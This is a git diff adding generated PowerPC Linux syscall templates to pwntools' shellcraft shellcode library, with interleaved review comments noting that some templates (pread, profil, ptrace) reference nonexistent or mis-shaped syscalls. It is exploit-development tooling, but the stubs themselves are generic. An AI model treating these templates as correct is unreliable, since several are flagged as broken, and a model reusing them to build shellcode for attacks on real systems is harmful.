+<%docstring>
+Invokes the syscall pipe. See 'man 2 pipe' for more information.
+
+Arguments:
+ pipedes(int): pipedes
+
+
+ ${syscall('SYS_pipe', pipedes)}
diff --git a/pwnlib/shellcraft/templates/powerpc/linux/pipe2.asm b/pwnlib/shellcraft/templates/powerpc/linux/pipe2.asm
new file mode 100644
index 000000000..4cabdb567
--- /dev/null
+++ b/pwnlib/shellcraft/templates/powerpc/linux/pipe2.asm
@@ -0,0 +1,14 @@
+
+<%
+ from pwnlib.shellcraft.powerpc.linux import syscall
+%>
+<%page args="pipedes, flags"/>
+<%docstring>
+Invokes the syscall pipe2. See 'man 2 pipe2' for more information.
+
+Arguments:
+ pipedes(int): pipedes
+ flags(int): flags
+
+
+ ${syscall('SYS_pipe2', pipedes, flags)}
diff --git a/pwnlib/shellcraft/templates/powerpc/linux/poll.asm b/pwnlib/shellcraft/templates/powerpc/linux/poll.asm
new file mode 100644
index 000000000..531003872
--- /dev/null
+++ b/pwnlib/shellcraft/templates/powerpc/linux/poll.asm
@@ -0,0 +1,15 @@
+
+<%
+ from pwnlib.shellcraft.powerpc.linux import syscall
+%>
+<%page args="fds, nfds, timeout"/>
+<%docstring>
+Invokes the syscall poll. See 'man 2 poll' for more information.
+
+Arguments:
+ fds(pollfd): fds
+ nfds(nfds_t): nfds
+ timeout(int): timeout
+
+
+ ${syscall('SYS_poll', fds, nfds, timeout)}
diff --git a/pwnlib/shellcraft/templates/powerpc/linux/ppoll.asm b/pwnlib/shellcraft/templates/powerpc/linux/ppoll.asm
new file mode 100644
index 000000000..a83606361
--- /dev/null
+++ b/pwnlib/shellcraft/templates/powerpc/linux/ppoll.asm
@@ -0,0 +1,16 @@
+
+<%
+ from pwnlib.shellcraft.powerpc.linux import syscall
+%>
+<%page args="fds, nfds, timeout, ss"/>
+<%docstring>
+Invokes the syscall ppoll. See 'man 2 ppoll' for more information.
+
+Arguments:
+ fds(pollfd): fds
+ nfds(nfds_t): nfds
+ timeout(timespec): timeout
+ ss(sigset_t): ss
+
+
+ ${syscall('SYS_ppoll', fds, nfds, timeout, ss)}
diff --git a/pwnlib/shellcraft/templates/powerpc/linux/prctl.asm b/pwnlib/shellcraft/templates/powerpc/linux/prctl.asm
new file mode 100644
index 000000000..f54f5f577
--- /dev/null
+++ b/pwnlib/shellcraft/templates/powerpc/linux/prctl.asm
@@ -0,0 +1,14 @@
+
+<%
+ from pwnlib.shellcraft.powerpc.linux import syscall
+%>
+<%page args="option, vararg"/>
+<%docstring>
+Invokes the syscall prctl. See 'man 2 prctl' for more information.
+
+Arguments:
+ option(int): option
+ vararg(int): vararg
+
+
+ ${syscall('SYS_prctl', option, vararg)}
diff --git a/pwnlib/shellcraft/templates/powerpc/linux/pread.asm b/pwnlib/shellcraft/templates/powerpc/linux/pread.asm
new file mode 100644
index 000000000..55046bfb4
--- /dev/null
+++ b/pwnlib/shellcraft/templates/powerpc/linux/pread.asm
@@ -0,0 +1,16 @@
+
+<%
+ from pwnlib.shellcraft.powerpc.linux import syscall
+%>
+<%page args="fd, buf, nbytes, offset"/>
+<%docstring>
+Invokes the syscall pread. See 'man 2 pread' for more information.
+
+Arguments:
+ fd(int): fd
+ buf(void): buf
+ nbytes(size_t): nbytes
+ offset(off_t): offset
+
+
+ ${syscall('SYS_pread', fd, buf, nbytes, offset)}
diff --git a/pwnlib/shellcraft/templates/powerpc/linux/preadv.asm b/pwnlib/shellcraft/templates/powerpc/linux/preadv.asm
new file mode 100644
index 000000000..5bbe78eda
--- /dev/null
+++ b/pwnlib/shellcraft/templates/powerpc/linux/preadv.asm
@@ -0,0 +1,16 @@
+
+<%
+ from pwnlib.shellcraft.powerpc.linux import syscall
+%>
+<%page args="fd, iovec, count, offset"/>
+<%docstring>
+Invokes the syscall preadv. See 'man 2 preadv' for more information.
+
+Arguments:
+ fd(int): fd
+ iovec(iovec): iovec
+ count(int): count
+ offset(off_t): offset
+
+
+ ${syscall('SYS_preadv', fd, iovec, count, offset)}
diff --git a/pwnlib/shellcraft/templates/powerpc/linux/prlimit64.asm b/pwnlib/shellcraft/templates/powerpc/linux/prlimit64.asm
new file mode 100644
index 000000000..f082f59d5
--- /dev/null
+++ b/pwnlib/shellcraft/templates/powerpc/linux/prlimit64.asm
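Review bot: `SYS_pread` on the last line of the pread hunk is a libc wrapper name, not a kernel one: the powerpc syscall table defines this entry as `pread64` (and `pwrite64`), so unless `pwnlib.constants.linux.powerpc` (not visible here) adds an alias, `${syscall('SYS_pread', fd, buf, nbytes, offset)}` will fail at render time when the constant is looked up, and the 64-bit `offset` is also split across two registers on 32-bit powerpc, which the single `off_t` argument cannot express. Worth cross-checking every `SYS_*` name these generated templates reference against the constants module, and emitting `${syscall('SYS_pread64', fd, buf, nbytes, offset)}` where the kernel name differs from the glibc prototype. The pwrite template in this commit needs the same check.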
@@ -0,0 +1,16 @@
+
+<%
+ from pwnlib.shellcraft.powerpc.linux import syscall
+%>
+<%page args="pid, resource, new_limit, old_limit"/>
+<%docstring>
+Invokes the syscall prlimit64. See 'man 2 prlimit64' for more information.
+
+Arguments:
+ pid(pid_t): pid
+ resource(rlimit_resource): resource
+ new_limit(rlimit64): new_limit
+ old_limit(rlimit64): old_limit
+
+
+ ${syscall('SYS_prlimit64', pid, resource, new_limit, old_limit)}
diff --git a/pwnlib/shellcraft/templates/powerpc/linux/profil.asm b/pwnlib/shellcraft/templates/powerpc/linux/profil.asm
new file mode 100644
index 000000000..f9e7540c6
--- /dev/null
+++ b/pwnlib/shellcraft/templates/powerpc/linux/profil.asm
@@ -0,0 +1,16 @@
+
+<%
+ from pwnlib.shellcraft.powerpc.linux import syscall
+%>
+<%page args="sample_buffer, size, offset, scale"/>
+<%docstring>
+Invokes the syscall profil. See 'man 2 profil' for more information.
+
+Arguments:
+ sample_buffer(unsigned): sample_buffer
+ size(size_t): size
+ offset(size_t): offset
+ scale(unsigned): scale
+
+
+ ${syscall('SYS_profil', sample_buffer, size, offset, scale)}
diff --git a/pwnlib/shellcraft/templates/powerpc/linux/ptrace.asm b/pwnlib/shellcraft/templates/powerpc/linux/ptrace.asm
new file mode 100644
index 000000000..c1d18a562
--- /dev/null
+++ b/pwnlib/shellcraft/templates/powerpc/linux/ptrace.asm
@@ -0,0 +1,14 @@
+
+<%
+ from pwnlib.shellcraft.powerpc.linux import syscall
+%>
+<%page args="request, vararg"/>
+<%docstring>
+Invokes the syscall ptrace. See 'man 2 ptrace' for more information.
+
+Arguments:
+ request(ptrace_request): request
+ vararg(int): vararg
+
+
+ ${syscall('SYS_ptrace', request, vararg)}
diff --git a/pwnlib/shellcraft/templates/powerpc/linux/putpmsg.asm b/pwnlib/shellcraft/templates/powerpc/linux/putpmsg.asm
new file mode 100644
index 000000000..4a1c3a5cd
--- /dev/null
+++ b/pwnlib/shellcraft/templates/powerpc/linux/putpmsg.asm
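Review bot: Linux has no `profil` system call — glibc implements `profil(3)` in user space on top of `setitimer` — so `${syscall('SYS_profil', sample_buffer, size, offset, scale)}` names a constant that should not exist in the powerpc syscall table and the template can only fail when it is first rendered. Since these templates look generated from glibc prototypes rather than from the kernel's `__NR_` list, the generator should skip names with no kernel entry point (profil is one; the docstring's `See 'man 2 profil'` also points at a page that does not exist, as the function is documented in section 3).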
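Review bot: Collapsing ptrace's variadic arguments into one `vararg` leaves the template unable to express most requests: the kernel entry point takes `(request, pid, addr, data)`, so `${syscall('SYS_ptrace', request, vararg)}` can set `pid` but never `addr` or `data`, which `PTRACE_PEEKTEXT`/`PTRACE_POKEDATA` require, and the helper's behaviour for the unspecified registers is not visible here. Spelling out the kernel signature, `<%page args="request, pid=0, addr=0, data=0"/>` with `${syscall('SYS_ptrace', request, pid, addr, data)}` and matching docstring lines, keeps existing two-argument calls working while covering the rest; the prctl template in this commit has the same shape and would benefit from the same treatment.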
@@ -0,0 +1,17 @@
+
+<%
+ from pwnlib.shellcraft.powerpc.linux import syscall
+%>
+<%page args="fildes, ctlptr, dataptr, band, flags"/>
+<%docstring>
+Invokes the syscall putpmsg. See 'man 2 putpmsg' for more information.
+
+Arguments:
+ fildes(int): fildes
+ ctlptr(strbuf): ctlptr
+ dataptr(strbuf): dataptr
+ band(int): band
+ flags(int): flags
+
+
+ ${syscall('SYS_putpmsg', fildes, ctlptr, dataptr, band, flags)}
diff --git a/pwnlib/shellcraft/templates/powerpc/linux/pwrite.asm b/pwnlib/shellcraft/templates/powerpc/linux/pwrite.asm
new file mode 100644
index 000000000..26b07fd67
--- /dev/null
+++ b/pwnlib/shellcraft/templates/powerpc/linux/pwrite.asm
@@ -0,0 +1,16 @@
+
+<%
+ from pwnlib.shellcraft.powerpc.linux import syscall
+%>
+<%page args="fd, buf, n, offset"/>
+<%docstring>
+Invokes the syscall pwrite. See 'man 2 pwrite' for more information.
+
+Arguments:
+ fd(int): fd
+ buf(void): buf
+ n(size_t): n
+ offset(off_t): offset
+
+
+ ${syscall('SYS_pwrite', fd, buf, n, offset)}
diff --git a/pwnlib/shellcraft/templates/powerpc/linux/pwritev.asm b/pwnlib/shellcraft/templates/powerpc/linux/pwritev.asm
new file mode 100644
index 000000000..981d60886
--- /dev/null
+++ b/pwnlib/shellcraft/templates/powerpc/linux/pwritev.asm
@@ -0,0 +1,16 @@
+
+<%
+ from pwnlib.shellcraft.powerpc.linux import syscall
+%>
+<%page args="fd, iovec, count, offset"/>
+<%docstring>
+Invokes the syscall pwritev. See 'man 2 pwritev' for more information.
+
+Arguments:
+ fd(int): fd
+ iovec(iovec): iovec
+ count(int): count
+ offset(off_t): offset
+
+
+ ${syscall('SYS_pwritev', fd, iovec, count, offset)}
diff --git a/pwnlib/shellcraft/templates/powerpc/linux/read.asm b/pwnlib/shellcraft/templates/powerpc/linux/read.asm
new file mode 100644
index 000000000..dc1776723
--- /dev/null
+++ b/pwnlib/shellcraft/templates/powerpc/linux/read.asm
@@ -0,0 +1,15 @@
+
+<%
+ from pwnlib.shellcraft.powerpc.linux import syscall
+%>
+<%page args="fd, buf, nbytes"/>
+<%docstring>
+Invokes the syscall read. See 'man 2 read' for more information.
+
+Arguments:
+ fd(int): fd
+ buf(void): buf
+ nbytes(size_t): nbytes
+
+
+ ${syscall('SYS_read', fd, buf, nbytes)}
diff --git a/pwnlib/shellcraft/templates/powerpc/linux/readahead.asm b/pwnlib/shellcraft/templates/powerpc/linux/readahead.asm
new file mode 100644
index 000000000..c5af1bb51
--- /dev/null
+++ b/pwnlib/shellcraft/templates/powerpc/linux/readahead.asm
@@ -0,0 +1,15 @@
+
+<%
+ from pwnlib.shellcraft.powerpc.linux import syscall
+%>
+<%page args="fd, offset, count"/>
+<%docstring>
+Invokes the syscall readahead. See 'man 2 readahead' for more information.
+
+Arguments:
+ fd(int): fd
+ offset(off64_t): offset
+ count(size_t): count
+
+
+ ${syscall('SYS_readahead', fd, offset, count)}
diff --git a/pwnlib/shellcraft/templates/powerpc/linux/readdir.asm b/pwnlib/shellcraft/templates/powerpc/linux/readdir.asm
new file mode 100644
index 000000000..b2f872a0f
--- /dev/null
+++ b/pwnlib/shellcraft/templates/powerpc/linux/readdir.asm
@@ -0,0 +1,13 @@
+
+<%
+ from pwnlib.shellcraft.powerpc.linux import syscall
+%>
+<%page args="dirp"/>
+<%docstring>
+Invokes the syscall readdir. See 'man 2 readdir' for more information.
+
+Arguments:
+ dirp(DIR): dirp
+
+
+ ${syscall('SYS_readdir', dirp)}
diff --git a/pwnlib/shellcraft/templates/powerpc/linux/readlink.asm b/pwnlib/shellcraft/templates/powerpc/linux/readlink.asm
new file mode 100644
index 000000000..99eb246c9
--- /dev/null
+++ b/pwnlib/shellcraft/templates/powerpc/linux/readlink.asm
@@ -0,0 +1,15 @@
+
+<%
+ from pwnlib.shellcraft.powerpc.linux import syscall
+%>
+<%page args="path, buf, len"/>
+<%docstring>
+Invokes the syscall readlink. See 'man 2 readlink' for more information.
+
+Arguments:
+ path(char): path
+ buf(char): buf
+ len(size_t): len
+
+
+ ${syscall('SYS_readlink', path, buf, len)}
diff --git a/pwnlib/shellcraft/templates/powerpc/linux/readlinkat.asm b/pwnlib/shellcraft/templates/powerpc/linux/readlinkat.asm
new file mode 100644
index 000000000..2477bd688
--- /dev/null
+++ b/pwnlib/shellcraft/templates/powerpc/linux/readlinkat.asm
@@ -0,0 +1,16 @@
+
+<%
+ from pwnlib.shellcraft.powerpc.linux import syscall
+%>
+<%page args="fd, path, buf, len"/>
+<%docstring>
+Invokes the syscall readlinkat. See 'man 2 readlinkat' for more information.
+
+Arguments:
+ fd(int): fd
+ path(char): path
+ buf(char): buf
+ len(size_t): len
+
+
+ ${syscall('SYS_readlinkat', fd, path, buf, len)}
diff --git a/pwnlib/shellcraft/templates/powerpc/linux/readv.asm b/pwnlib/shellcraft/templates/powerpc/linux/readv.asm
new file mode 100644
index 000000000..3572ec2f1
--- /dev/null
+++ b/pwnlib/shellcraft/templates/powerpc/linux/readv.asm
@@ -0,0 +1,15 @@
+
+<%
+ from pwnlib.shellcraft.powerpc.linux import syscall
+%>
+<%page args="fd, iovec, count"/>
+<%docstring>
+Invokes the syscall readv. See 'man 2 readv' for more information.
+
+Arguments:
+ fd(int): fd
+ iovec(iovec): iovec
+ count(int): count
+
+
+ ${syscall('SYS_readv', fd, iovec, count)}
diff --git a/pwnlib/shellcraft/templates/powerpc/linux/recv.asm b/pwnlib/shellcraft/templates/powerpc/linux/recv.asm
new file mode 100644
index 000000000..0046f4cf7
--- /dev/null
+++ b/pwnlib/shellcraft/templates/powerpc/linux/recv.asm
@@ -0,0 +1,16 @@
+
+<%
+ from pwnlib.shellcraft.powerpc.linux import syscall
+%>
+<%page args="fd, buf, n, flags"/>
+<%docstring>
+Invokes the syscall recv. See 'man 2 recv' for more information.
+
+Arguments:
+ fd(int): fd
+ buf(void): buf
+ n(size_t): n
+ flags(int): flags
+
+
+ ${syscall('SYS_recv', fd, buf, n, flags)}
diff --git a/pwnlib/shellcraft/templates/powerpc/linux/recvfrom.asm b/pwnlib/shellcraft/templates/powerpc/linux/recvfrom.asm
new file mode 100644
index 000000000..ced45536c
--- /dev/null
+++ b/pwnlib/shellcraft/templates/powerpc/linux/recvfrom.asm
@@ -0,0 +1,18 @@
+
+<%
+ from pwnlib.shellcraft.powerpc.linux import syscall
+%>
+<%page args="fd, buf, n, flags, addr, addr_len"/>
+<%docstring>
+Invokes the syscall recvfrom. See 'man 2 recvfrom' for more information.
+
+Arguments:
+ fd(int): fd
+ buf(void): buf
+ n(size_t): n
+ flags(int): flags
+ addr(SOCKADDR_ARG): addr
+ addr_len(socklen_t): addr_len
+
+
+ ${syscall('SYS_recvfrom', fd, buf, n, flags, addr, addr_len)}
diff --git a/pwnlib/shellcraft/templates/powerpc/linux/recvmmsg.asm b/pwnlib/shellcraft/templates/powerpc/linux/recvmmsg.asm
new file mode 100644
index 000000000..9a18b959f
--- /dev/null
+++ b/pwnlib/shellcraft/templates/powerpc/linux/recvmmsg.asm
@@ -0,0 +1,17 @@
+
+<%
+ from pwnlib.shellcraft.powerpc.linux import syscall
+%>
+<%page args="fd, vmessages, vlen, flags, tmo"/>
+<%docstring>
+Invokes the syscall recvmmsg. See 'man 2 recvmmsg' for more information.
+
+Arguments:
+ fd(int): fd
+ vmessages(mmsghdr): vmessages
+ vlen(unsigned): vlen
+ flags(int): flags
+ tmo(timespec): tmo
+
+
+ ${syscall('SYS_recvmmsg', fd, vmessages, vlen, flags, tmo)}
diff --git a/pwnlib/shellcraft/templates/powerpc/linux/recvmsg.asm b/pwnlib/shellcraft/templates/powerpc/linux/recvmsg.asm
new file mode 100644
index 000000000..fbd87e47d
--- /dev/null
+++ b/pwnlib/shellcraft/templates/powerpc/linux/recvmsg.asm
@@ -0,0 +1,15 @@
+
+<%
+ from pwnlib.shellcraft.powerpc.linux import syscall
+%>
+<%page args="fd, message, flags"/>
+<%docstring>
+Invokes the syscall recvmsg. See 'man 2 recvmsg' for more information.
+
+Arguments:
+ fd(int): fd
+ message(msghdr): message
+ flags(int): flags
+
+
+ ${syscall('SYS_recvmsg', fd, message, flags)}
diff --git a/pwnlib/shellcraft/templates/powerpc/linux/remap_file_pages.asm b/pwnlib/shellcraft/templates/powerpc/linux/remap_file_pages.asm
new file mode 100644
index 000000000..9625fcd5f
--- /dev/null
+++ b/pwnlib/shellcraft/templates/powerpc/linux/remap_file_pages.asm
@@ -0,0 +1,17 @@ + +<% + from pwnlib.shellcraft.powerpc.linux import syscall +%> +<%page args="start, size, prot, pgoff, flags"/> +<%docstring> +Invokes the syscall remap_file_pages. See 'man 2 remap_file_pages' for more information. + +Arguments: + start(void): start + size(size_t): size + prot(int): prot + pgoff(size_t): pgoff + flags(int): flags + + + ${syscall('SYS_remap_file_pages', start, size, prot, pgoff, flags)} diff --git a/pwnlib/shellcraft/templates/powerpc/linux/rename.asm b/pwnlib/shellcraft/templates/powerpc/linux/rename.asm new file mode 100644 index 000000000..08128bf69 --- /dev/null +++ b/pwnlib/shellcraft/templates/powerpc/linux/rename.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.powerpc.linux import syscall +%> +<%page args="old, new"/> +<%docstring> +Invokes the syscall rename. See 'man 2 rename' for more information. + +Arguments: + old(char): old + new(char): new + + + ${syscall('SYS_rename', old, new)} diff --git a/pwnlib/shellcraft/templates/powerpc/linux/renameat.asm b/pwnlib/shellcraft/templates/powerpc/linux/renameat.asm new file mode 100644 index 000000000..1c218f4e2 --- /dev/null +++ b/pwnlib/shellcraft/templates/powerpc/linux/renameat.asm @@ -0,0 +1,16 @@ + +<% + from pwnlib.shellcraft.powerpc.linux import syscall +%> +<%page args="oldfd, old, newfd, new"/> +<%docstring> +Invokes the syscall renameat. See 'man 2 renameat' for more information. + +Arguments: + oldfd(int): oldfd + old(char): old + newfd(int): newfd + new(char): new + + + ${syscall('SYS_renameat', oldfd, old, newfd, new)} diff --git a/pwnlib/shellcraft/templates/powerpc/linux/rmdir.asm b/pwnlib/shellcraft/templates/powerpc/linux/rmdir.asm new file mode 100644 index 000000000..b036d6b5d --- /dev/null +++ b/pwnlib/shellcraft/templates/powerpc/linux/rmdir.asm 
@@ -0,0 +1,13 @@ + +<% + from pwnlib.shellcraft.powerpc.linux import syscall +%> +<%page args="path"/> +<%docstring> +Invokes the syscall rmdir. See 'man 2 rmdir' for more information. + +Arguments: + path(char): path + + + ${syscall('SYS_rmdir', path)} diff --git a/pwnlib/shellcraft/templates/powerpc/linux/sched_get_priority_max.asm b/pwnlib/shellcraft/templates/powerpc/linux/sched_get_priority_max.asm new file mode 100644 index 000000000..3d72212a3 --- /dev/null +++ b/pwnlib/shellcraft/templates/powerpc/linux/sched_get_priority_max.asm @@ -0,0 +1,13 @@ + +<% + from pwnlib.shellcraft.powerpc.linux import syscall +%> +<%page args="algorithm"/> +<%docstring> +Invokes the syscall sched_get_priority_max. See 'man 2 sched_get_priority_max' for more information. + +Arguments: + algorithm(int): algorithm + + + ${syscall('SYS_sched_get_priority_max', algorithm)} diff --git a/pwnlib/shellcraft/templates/powerpc/linux/sched_get_priority_min.asm b/pwnlib/shellcraft/templates/powerpc/linux/sched_get_priority_min.asm new file mode 100644 index 000000000..8f353141c --- /dev/null +++ b/pwnlib/shellcraft/templates/powerpc/linux/sched_get_priority_min.asm @@ -0,0 +1,13 @@ + +<% + from pwnlib.shellcraft.powerpc.linux import syscall +%> +<%page args="algorithm"/> +<%docstring> +Invokes the syscall sched_get_priority_min. See 'man 2 sched_get_priority_min' for more information. + +Arguments: + algorithm(int): algorithm + + + ${syscall('SYS_sched_get_priority_min', algorithm)} diff --git a/pwnlib/shellcraft/templates/powerpc/linux/sched_getaffinity.asm b/pwnlib/shellcraft/templates/powerpc/linux/sched_getaffinity.asm new file mode 100644 index 000000000..22890acbd --- /dev/null +++ b/pwnlib/shellcraft/templates/powerpc/linux/sched_getaffinity.asm 
@@ -0,0 +1,15 @@ + +<% + from pwnlib.shellcraft.powerpc.linux import syscall +%> +<%page args="pid, cpusetsize, cpuset"/> +<%docstring> +Invokes the syscall sched_getaffinity. See 'man 2 sched_getaffinity' for more information. + +Arguments: + pid(pid_t): pid + cpusetsize(size_t): cpusetsize + cpuset(cpu_set_t): cpuset + + + ${syscall('SYS_sched_getaffinity', pid, cpusetsize, cpuset)} diff --git a/pwnlib/shellcraft/templates/powerpc/linux/sched_getparam.asm b/pwnlib/shellcraft/templates/powerpc/linux/sched_getparam.asm new file mode 100644 index 000000000..61ecde15f --- /dev/null +++ b/pwnlib/shellcraft/templates/powerpc/linux/sched_getparam.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.powerpc.linux import syscall +%> +<%page args="pid, param"/> +<%docstring> +Invokes the syscall sched_getparam. See 'man 2 sched_getparam' for more information. + +Arguments: + pid(pid_t): pid + param(sched_param): param + + + ${syscall('SYS_sched_getparam', pid, param)} diff --git a/pwnlib/shellcraft/templates/powerpc/linux/sched_getscheduler.asm b/pwnlib/shellcraft/templates/powerpc/linux/sched_getscheduler.asm new file mode 100644 index 000000000..9125f0aa9 --- /dev/null +++ b/pwnlib/shellcraft/templates/powerpc/linux/sched_getscheduler.asm @@ -0,0 +1,13 @@ + +<% + from pwnlib.shellcraft.powerpc.linux import syscall +%> +<%page args="pid"/> +<%docstring> +Invokes the syscall sched_getscheduler. See 'man 2 sched_getscheduler' for more information. + +Arguments: + pid(pid_t): pid + + + ${syscall('SYS_sched_getscheduler', pid)} diff --git a/pwnlib/shellcraft/templates/powerpc/linux/sched_rr_get_interval.asm b/pwnlib/shellcraft/templates/powerpc/linux/sched_rr_get_interval.asm new file mode 100644 index 000000000..7ef4e46b1 --- /dev/null +++ b/pwnlib/shellcraft/templates/powerpc/linux/sched_rr_get_interval.asm 
@@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.powerpc.linux import syscall +%> +<%page args="pid, t"/> +<%docstring> +Invokes the syscall sched_rr_get_interval. See 'man 2 sched_rr_get_interval' for more information. + +Arguments: + pid(pid_t): pid + t(timespec): t + + + ${syscall('SYS_sched_rr_get_interval', pid, t)} diff --git a/pwnlib/shellcraft/templates/powerpc/linux/sched_setaffinity.asm b/pwnlib/shellcraft/templates/powerpc/linux/sched_setaffinity.asm new file mode 100644 index 000000000..00eee51d2 --- /dev/null +++ b/pwnlib/shellcraft/templates/powerpc/linux/sched_setaffinity.asm @@ -0,0 +1,15 @@ + +<% + from pwnlib.shellcraft.powerpc.linux import syscall +%> +<%page args="pid, cpusetsize, cpuset"/> +<%docstring> +Invokes the syscall sched_setaffinity. See 'man 2 sched_setaffinity' for more information. + +Arguments: + pid(pid_t): pid + cpusetsize(size_t): cpusetsize + cpuset(cpu_set_t): cpuset + + + ${syscall('SYS_sched_setaffinity', pid, cpusetsize, cpuset)} diff --git a/pwnlib/shellcraft/templates/powerpc/linux/sched_setparam.asm b/pwnlib/shellcraft/templates/powerpc/linux/sched_setparam.asm new file mode 100644 index 000000000..e41c518d8 --- /dev/null +++ b/pwnlib/shellcraft/templates/powerpc/linux/sched_setparam.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.powerpc.linux import syscall +%> +<%page args="pid, param"/> +<%docstring> +Invokes the syscall sched_setparam. See 'man 2 sched_setparam' for more information. + +Arguments: + pid(pid_t): pid + param(sched_param): param + + + ${syscall('SYS_sched_setparam', pid, param)} diff --git a/pwnlib/shellcraft/templates/powerpc/linux/sched_setscheduler.asm b/pwnlib/shellcraft/templates/powerpc/linux/sched_setscheduler.asm new file mode 100644 index 000000000..9dc1e8359 --- /dev/null +++ b/pwnlib/shellcraft/templates/powerpc/linux/sched_setscheduler.asm 
@@ -0,0 +1,15 @@ + +<% + from pwnlib.shellcraft.powerpc.linux import syscall +%> +<%page args="pid, policy, param"/> +<%docstring> +Invokes the syscall sched_setscheduler. See 'man 2 sched_setscheduler' for more information. + +Arguments: + pid(pid_t): pid + policy(int): policy + param(sched_param): param + + + ${syscall('SYS_sched_setscheduler', pid, policy, param)} diff --git a/pwnlib/shellcraft/templates/powerpc/linux/sched_yield.asm b/pwnlib/shellcraft/templates/powerpc/linux/sched_yield.asm new file mode 100644 index 000000000..64afd85ba --- /dev/null +++ b/pwnlib/shellcraft/templates/powerpc/linux/sched_yield.asm @@ -0,0 +1,13 @@ + +<% + from pwnlib.shellcraft.powerpc.linux import syscall +%> +<%page args=""/> +<%docstring> +Invokes the syscall sched_yield. See 'man 2 sched_yield' for more information. + +Arguments: + + + + ${syscall('SYS_sched_yield')} diff --git a/pwnlib/shellcraft/templates/powerpc/linux/select.asm b/pwnlib/shellcraft/templates/powerpc/linux/select.asm new file mode 100644 index 000000000..a98a3d920 --- /dev/null +++ b/pwnlib/shellcraft/templates/powerpc/linux/select.asm @@ -0,0 +1,17 @@ + +<% + from pwnlib.shellcraft.powerpc.linux import syscall +%> +<%page args="nfds, readfds, writefds, exceptfds, timeout"/> +<%docstring> +Invokes the syscall select. See 'man 2 select' for more information. + +Arguments: + nfds(int): nfds + readfds(fd_set): readfds + writefds(fd_set): writefds + exceptfds(fd_set): exceptfds + timeout(timeval): timeout + + + ${syscall('SYS_select', nfds, readfds, writefds, exceptfds, timeout)} diff --git a/pwnlib/shellcraft/templates/powerpc/linux/sendfile.asm b/pwnlib/shellcraft/templates/powerpc/linux/sendfile.asm new file mode 100644 index 000000000..672c1a83d --- /dev/null +++ b/pwnlib/shellcraft/templates/powerpc/linux/sendfile.asm 
@@ -0,0 +1,16 @@ + +<% + from pwnlib.shellcraft.powerpc.linux import syscall +%> +<%page args="out_fd, in_fd, offset, count"/> +<%docstring> +Invokes the syscall sendfile. See 'man 2 sendfile' for more information. + +Arguments: + out_fd(int): out_fd + in_fd(int): in_fd + offset(off_t): offset + count(size_t): count + + + ${syscall('SYS_sendfile', out_fd, in_fd, offset, count)} diff --git a/pwnlib/shellcraft/templates/powerpc/linux/sendfile64.asm b/pwnlib/shellcraft/templates/powerpc/linux/sendfile64.asm new file mode 100644 index 000000000..b49e355ab --- /dev/null +++ b/pwnlib/shellcraft/templates/powerpc/linux/sendfile64.asm @@ -0,0 +1,16 @@ + +<% + from pwnlib.shellcraft.powerpc.linux import syscall +%> +<%page args="out_fd, in_fd, offset, count"/> +<%docstring> +Invokes the syscall sendfile64. See 'man 2 sendfile64' for more information. + +Arguments: + out_fd(int): out_fd + in_fd(int): in_fd + offset(off64_t): offset + count(size_t): count + + + ${syscall('SYS_sendfile64', out_fd, in_fd, offset, count)} diff --git a/pwnlib/shellcraft/templates/powerpc/linux/setdomainname.asm b/pwnlib/shellcraft/templates/powerpc/linux/setdomainname.asm new file mode 100644 index 000000000..52a291608 --- /dev/null +++ b/pwnlib/shellcraft/templates/powerpc/linux/setdomainname.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.powerpc.linux import syscall +%> +<%page args="name, len"/> +<%docstring> +Invokes the syscall setdomainname. See 'man 2 setdomainname' for more information. + +Arguments: + name(char): name + len(size_t): len + + + ${syscall('SYS_setdomainname', name, len)} diff --git a/pwnlib/shellcraft/templates/powerpc/linux/setgid.asm b/pwnlib/shellcraft/templates/powerpc/linux/setgid.asm new file mode 100644 index 000000000..d89e5e8bc --- /dev/null +++ b/pwnlib/shellcraft/templates/powerpc/linux/setgid.asm 
@@ -0,0 +1,13 @@ + +<% + from pwnlib.shellcraft.powerpc.linux import syscall +%> +<%page args="gid"/> +<%docstring> +Invokes the syscall setgid. See 'man 2 setgid' for more information. + +Arguments: + gid(gid_t): gid + + + ${syscall('SYS_setgid', gid)} diff --git a/pwnlib/shellcraft/templates/powerpc/linux/setgroups.asm b/pwnlib/shellcraft/templates/powerpc/linux/setgroups.asm new file mode 100644 index 000000000..ffc1803af --- /dev/null +++ b/pwnlib/shellcraft/templates/powerpc/linux/setgroups.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.powerpc.linux import syscall +%> +<%page args="n, groups"/> +<%docstring> +Invokes the syscall setgroups. See 'man 2 setgroups' for more information. + +Arguments: + n(size_t): n + groups(gid_t): groups + + + ${syscall('SYS_setgroups', n, groups)} diff --git a/pwnlib/shellcraft/templates/powerpc/linux/sethostname.asm b/pwnlib/shellcraft/templates/powerpc/linux/sethostname.asm new file mode 100644 index 000000000..6f2340bac --- /dev/null +++ b/pwnlib/shellcraft/templates/powerpc/linux/sethostname.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.powerpc.linux import syscall +%> +<%page args="name, len"/> +<%docstring> +Invokes the syscall sethostname. See 'man 2 sethostname' for more information. + +Arguments: + name(char): name + len(size_t): len + + + ${syscall('SYS_sethostname', name, len)} diff --git a/pwnlib/shellcraft/templates/powerpc/linux/setitimer.asm b/pwnlib/shellcraft/templates/powerpc/linux/setitimer.asm new file mode 100644 index 000000000..d62f4a514 --- /dev/null +++ b/pwnlib/shellcraft/templates/powerpc/linux/setitimer.asm @@ -0,0 +1,15 @@ + +<% + from pwnlib.shellcraft.powerpc.linux import syscall +%> +<%page args="which, new, old"/> +<%docstring> +Invokes the syscall setitimer. See 'man 2 setitimer' for more information. + +Arguments: + which(itimer_which_t): which + new(itimerval): new + old(itimerval): old + + + ${syscall('SYS_setitimer', which, new, old)} 
